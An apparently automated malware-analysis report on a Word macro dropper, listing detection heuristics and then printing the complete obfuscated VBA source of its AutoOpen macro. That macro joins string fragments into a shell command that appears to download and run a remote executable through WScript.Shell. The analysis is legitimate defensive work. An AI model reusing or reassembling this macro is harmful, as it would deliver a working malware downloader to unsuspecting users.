Malware Insights
The file is a malicious Word document containing VBA macros, as indicated by multiple heuristic firings including OLE_VBA_MACROS and OLE_VBA_PCODE_AUTOEXEC_EXEC. The document body prompts the user to 'Enable Editing' and 'Enable Content', a common social engineering tactic to bypass macro security. The presence of the ClamAV detection 'Doc.Dropper.Agent-5551279-0' strongly suggests it functions as a dropper for further malicious activity. The VBA code itself is heavily obfuscated, making specific payload analysis difficult, but the overall intent is to execute code upon macro enablement.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-5551279-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-5551279-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched lines in script: `ujteqyvfy = yvawc & avywg2 & joqyzgakw0` and `Set ukkyje = CreateObject(ujteqyvfy)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script: `End Sub`, `Sub AutoOpen()`, `asoq`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Extracted URLs, all found in document text (OLE body):
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/xap/1.0/
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/photoshop/1.0/
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
  - http://ns.adobe.com/tiff/1.0/
  - http://ns.adobe.com/exif/1.0/
  - http://schemas.openxmlformats.org/drawingml/2006/main
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9125 bytes |

SHA-256 of macros.bas: 6bc288dd31b87766e495b1bb8b6df083a3d5eed51bf8f42e9b2e508cc07a6a87

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Attribute VB_Name = "Module2"
Attribute VB_Name = "mode"
Sub asoq()
Dim mx1, v, ne, yhj0, yvawc, xp0, bt, uv, r2, qd, w0, aks0, egc, h5, uw1, gi9, s3, ly, iq, db, ky, z6, c4, uh, i5, dko4, hu8, l6
If 940 = 170 Then
Dim xakxowq
xakxowq = False
' omzy ymi qsadatw ifdotesg anijlanip ceqmyw
End If
Dim o3, xle6, m3, x6, hc, aq, zk, ma8, oj, j0, joqyzgakw0, i, iws, cz0, fe, ry, hza3, igz, c, inj, bo, fr, e, e2, utk, o, qa7, pxu7, p, sf0, a4, llu4, de9, yk, lb, sw9, avywg2, di0
Select Case "mwukj"
Case "izolne"
Rem irycpo
Rem wqazawmi hahnu obemnafyhg
Rem wufwekyt
End Select
Dim qpy2, dv, tn, ju, kke, tco4, i4, mnu, qa2, ov, ga2, e7, bb0, gi, jj, a, u8, dt, wsy, gtu, sp, z5, uhc6, l, ov1, y, amx, ujteqyvfy, rly1, ir7, yp, hmy
Select Case "efoflu"
Case "iwwy"
Rem yxrimeso erbafpyl sgudivuh riw
Dim watdivi
watdivi = "593"
Dim ohbex
ohbex = "orp"
Case "izgasy"
' ebnawy guvoho lhig kfosu knajcifsog nvusl
Dim oslevum
oslevum = 4360
Dim vwuked
vwuked = 521
End Select
Dim it4, a1, tro, unn7, u, em
c = "'%A"
Select Case "isgor"
Case "dgicgi"
Dim sdytxeja
sdytxeja = #10/17/2015#
Dim ypamfa
ypamfa = #7/18/1989#
Case "eb"
Dim elagzalz
elagzalz = "9775"
Rem uwafifil snaqtavdopv
' kxacpehybi hycbeqd ugodp arlola absybofw
Dim inowum
inowum = "ocafy"
Case "gxe"
Dim alozp
alozp = True
Rem ofuknu
Dim pyty
pyty = "ykmeher"
Dim orxagil
orxagil = #9/9/2000#
End Select
x6 = "cMd"
h5 = "oBJ"
ju = "els"
Select Case "icsu"
Case "asre"
' eja keregkerr win hajju lgyn yhpiko vcyky
' lahesny tekpuk ogonfopqe
' adpumafm zdyxmo
End Select
m3 = "PPD"
sf0 = "Yp^"
gi9 = "xE'"
ly = "hEL"
ma8 = "dat"
uhc6 = "BCL"
uw1 = "eSs"
Rem irypaxz rifalewj nlivvihc ywvyfwuja tersan pejibewwy
hmy = "%.e"
Select Case 66
Case 633
Rem ugefe
Rem fec ujwi kylorxegbe
Rem emihafkomx lyjbycdah
' yky kihhurqorl pzyplolta szahjebw onhige
Case 607
Rem npap nbuwfo apfytto uwhinzavon
Dim ptujy
ptujy = 2089
' dvyjy wvezy ptazhedxelk ijripe kidzon
' tjatoqwe hkitv wfesa urxymijuj uxmukon cowhefsetqi
Case 920
Rem anlezhejugb ekto ibvocqobxef obubu dihu
Dim gsajfu
gsajfu = False
' ihiqhy zihantuc oxo
Rem yhnu ihup azkukhevymx izehonmek ynuxy
End Select
amx = "^e^"
If "jusz" = "xoma" Then
Rem edocevo yvqu lewil ajexidu lnode dzahacajl gewiqyfc
Rem yczukyx zcyny mipgate edibt iholab fgakipuw
End If
dt = "ATA"
j0 = "WNL"
Select Case "ernat"
Case "cihs"
Rem forageb dolmazzucku ojfefhen ekyvh
Case "ecxyto"
Dim tybdakj
tybdakj = #9/19/1997#
Dim vexal
vexal = #1/17/1967#
Dim xlymive
xlymive = 5434
End Select
oj = "Pro"
If "bycer" = "ufo" Then
Rem wdub ykyg
End If
v = "xE "
ga2 = " ^-"
mx1 = "r^o"
kke = "alf"
db = "FIl"
s3 = "//c"
Rem oqquny
bt = "ion"
a4 = "-wi"
Dim stubfig
stubfig = "3809"
o3 = "tp:"
xp0 = " -"
yk = "Xe'"
jj = ".co"
If 333 = 681 Then
Rem ulifhih vtafpeqme yhozn aro wury csazlyxgefy
Dim upyty
upyty = 8132
' qecezne xiquqz azahno
End If
sw9 = "e /"
iws = "sti"
qpy2 = """"
Select Case 231
Case 175
Dim nyfnamp
nyfnamp = 5119
Dim bifhen
bifhen = True
Dim usowfarr
usowfarr = #6/6/2019#
Rem wuhevpykk egladzaxvu qidud
End Select
i = "sys"
Dim ikupfy
ikupfy = False
c4 = "cho"
Select Case "uxajfy"
Case "pbamfe"
' ubqikole ragugo yjvegagra
End Select
qd = "iEN"
If "azhemo" = "llekor" Then
Dim opejakt
opejakt = #1/19/2017#
Dim kfimrakt
kfimrakt = #3/2/1989#
Dim dxorlekji
dxorlekji = 2261
End If
dv = "wsT"
i5 = "',^"
If "igk" = "yhulq" Then
Rem emi onizuge vyrjihul yqojuse fuvytsodu vsyzqex umerboxpedl
' knefocne bkibypgoqj aciksunw gqocror ewpi kysu
End If
fr = ".Do"
Select Case 624
Case 53
Dim sqihnyku
sqihnyku = "7034"
Rem ewunytd xhipwo ixo yfabzavre
End Select
e7 = "e^("
' ocdyn ajce yfzarkykt xmakikr aknycef clyvq
ttoslas = TypeName(ActiveDocument.CodeName) = "String"
Dim hizbati
hizbati = True
wsy = "^Df"
' daz rcunykzuzo lefavow uflywnuxtit epo wpelafbu
hu8 = "^c^"
If "dip" = "bhywnikx" Then
Rem ddyqke huwuvkot vlasp jqewboh dinbid nboq
Dim ircosx
ircosx = 666
Dim ednyq
ednyq = #2/5/2020#
End If
de9 = "o^A"
Select Case "ygove"
Case "amer"
Rem zbykmolraz yrzafocfaz xtuhesyty uvsyw rxawxosha ejpi xriqmo
Dim hpimafj
hpimafj = 2172
Dim yhogewx
yhogewx = #2/12/1972#
' ulseskojr mvajbulukse ansalilvip pophac ujxylosa
Case "qbulozc"
Rem agbezoqv tgeble elsyhjyp
' evmehicmab ofpix kahet mdig imxodendaq
Case "unfi"
Dim afkuwu
afkuwu = #4/23/1956#
Rem rfazudf oji tosja oscehiga enyvenhec
Dim yqkiqty
yqkiqty = "1813"
End Select
gi = "W-^"
uv = "u/t"
qa2 = "PPD"
Select Case 63
Case 487
Dim umuw
umuw = #7/7/1989#
' gyky zawnuhadmu
Dim ofyvcumg
ofyvcumg = False
Dim ahriznib
ahriznib = 1436
End Select
u8 = "po^"
e = "nO^"
If "sifu" = "qzugi" Then
Rem jorka usdotg
Rem atvobu ahuhzunna yzi udi ckim nyhyvzyw
Dim expuq
expuq = "pce"
End If
z6 = "^S^"
u = "wER"
Select Case "molne"
Case "ocivw"
Dim pywo
pywo = #3/21/2010#
End Select
vve = "oun"
Select Case "aksismi"
Case "ihjo"
Dim bmajri
bmajri = "7685"
Dim iwyf
iwyf = 6122
' lilzaj mapgacxyf mtezuxfo ydkaxuxiv wokke ahegryvg alca
' gyqdedme igimly ihhoxmaj
End Select
pxu7 = "ylE"
Dim jxylzyvke
jxylzyvke = #6/27/1959#
joqyzgakw0 = "ell"
Dim imnaj
imnaj = "az"
fe = ");s"
If 945 = 970 Then
Rem uxnazilz kolylyjzu apzi
End If
tn = "X^e"
Select Case 648
Case 914
' umaspy dbesu ipzem
Dim npusuhr
npusuhr = 2086
Case 153
Rem bibrawip zosytdikge lziban ppuplykomy hegoruty nehesby pnur
End Select
aq = "^ "
llu4 = "^WE"
Dim bburme
bburme = "8139"
i4 = " "
iq = " HI"
Dim qodle
qodle = #12/13/1992#
o = ".Ex"
If 682 = 293 Then
Dim yksyrt
yksyrt = 7099
Dim aniz
aniz = "jkytcapki"
End If
xle6 = "m/j"
mnu = "'%A"
igz = "p^O"
inj = "jew"
yvawc = "WScri"
uh = "NDO"
Rem huqugbiw yvhe lydna oqigdodyzb rdargigmal zkemupq
egc = "st."
tro = "^cY"
Select Case 386
Case 741
' zmuwanasj ache
Rem asgoxn ctaxre gkynqy frug
Dim zpurho
zpurho = "jago"
Case 954
Rem iqoxke qqezubale amyrjaxuj etxaxyxak uwet gqoxohnere
Dim pyxik
pyxik = 5062
Dim ycmaco
ycmaco = "hewror"
Dim ijwojy
ijwojy = 9236
End Select
z5 = "N^ "
Dim lispehza
lispehza = #6/4/2020#
ov = "s/f"
If 400 = 691 Then
' pqiwuqna efhagnuxmedb vkyhti okwudsegyfm fcewr njywqeksyx
Dim mihy
mihy = False
End If
p = "ine"
em = "'ht"
avywg2 = "pt.Sh"
ne = " (^"
If 866 = 586 Then
Rem seted kxym mlyhla
' iqitvy ohisrafit tqezupek
End If
gtu = "M.N"
Dim pyho
pyho = 7949
unn7 = "exe"
If "fojp" = "amo" Then
Dim gjyqoli
gjyqoli = #12/17/1971#
Rem uhhy fezehaxq yxzakokkiqg oqsobwy
End If
di0 = "aSs"
Dim icipu
icipu = "2181"
ir7 = "m.a"
cz0 = "Et."
Dim izapyl
izapyl = #4/21/1966#
w0 = "T^)"
r2 = "T-p"
aks0 = "/sv"
Select Case "abh"
Case "noz"
Dim yflurx
yflurx = 839
' vzavalpuz yrjizkubi juhucu vyq iqupfi ybasgyp
Rem lywexy laqy cizuzb oxqawpuvj iwenj
' toghyxatr ortirogx otamat dlidx olock
End Select
qa7 = " ^"
ky = "Ect"
Dim ymlufti
ymlufti = #10/26/1969#
a1 = " ^"
Dim umint
umint = #9/15/1961#
obwiho = ""
yhj0 = "c """
ov1 = "^ "
bb0 = "te^"
Select Case "uto"
Case "ndyxba"
' ufyxilvoqh
Rem nepeny jqaxatmi
End Select
tco4 = "Ne^"
rly1 = "^e^"
hc = "for"
sp = "iON"
Dim bceqofle
bceqofle = False
yp = "ypo"
If 761 = 197 Then
Dim yfycfudv
yfycfudv = False
Dim mkyti
mkyti = "oppy"
End If
utk = "aTa"
l = "cUT"
If 878 = 95 Then
' asafi eri evasdagpe uhejisix ilqysowucg
Rem ulbetpanh uczi koqicavv sqojd
End If
y = " b^"
lb = " "
dko4 = "ele"
hza3 = "E^ "
If 730 = 369 Then
' rgaxwo tkarg iculubd
Dim ufobas
ufobas = True
Dim ucviwajx
ucviwajx = "ofi"
End If
e2 = " ^"
l6 = "^lI"
ry = "TAr"
Select Case 987
Case 74
Dim ofsugq
ofsugq = True
' nvefge utxupuj ckizrept
Dim cwenulo
cwenulo = "538"
Case 287
' ejxynsija esbypy pima wqudletky rqognatridlo iwejpaxa sgilb
Rem lfeku apoqordi ysydsa isuminsef ntedcybqyqv ysgi
End Select
bo = "Il^"
zk = "l.E"
Rem tlojq
it4 = "%.E"
a = "^DD"
ujteqyvfy = yvawc & avywg2 & joqyzgakw0
Set ukkyje = CreateObject(ujteqyvfy)
If ttoslas Then
iqozj = Array(x6, o, sw9, yhj0, u8, u, z6, ly, zk, v, ga2, rly1, tn, l, sp, igz, l6, tro, aq, y, sf0, di0, xp0, e, oj, db, hza3, a1, a4, uh, dv, pxu7, lb, iq, a, amx, z5, ne, tco4, gi, h5, ky, i4, e2, i, bb0, gtu, cz0, llu4, uhc6, qd, w0, fr, j0, de9, wsy, bo, e7, em, o3, s3, dko4, iws, kke, p, inj, ju, jj, ir7, uv, yp, hc, xle6, ov, vve, ma8, bt, aks0, c4, egc, unn7, i5, c, m3, dt, it4, yk, fe, ry, r2, mx1, hu8, uw1, ov1, qa7, mnu, qa2, utk, hmy, gi9, qpy2)
Select Case "ycy"
Case "ide"
Dim ypiwa
ypiwa = 1257
Dim lfyhsaznu
lfyhsaznu = "8227"
End Select
gqepa = Array(Join(iqozj, obwiho))(0)
ukkyje.Run gqepa, False
End If
End Sub
Sub AutoOpen()
asoq
End Sub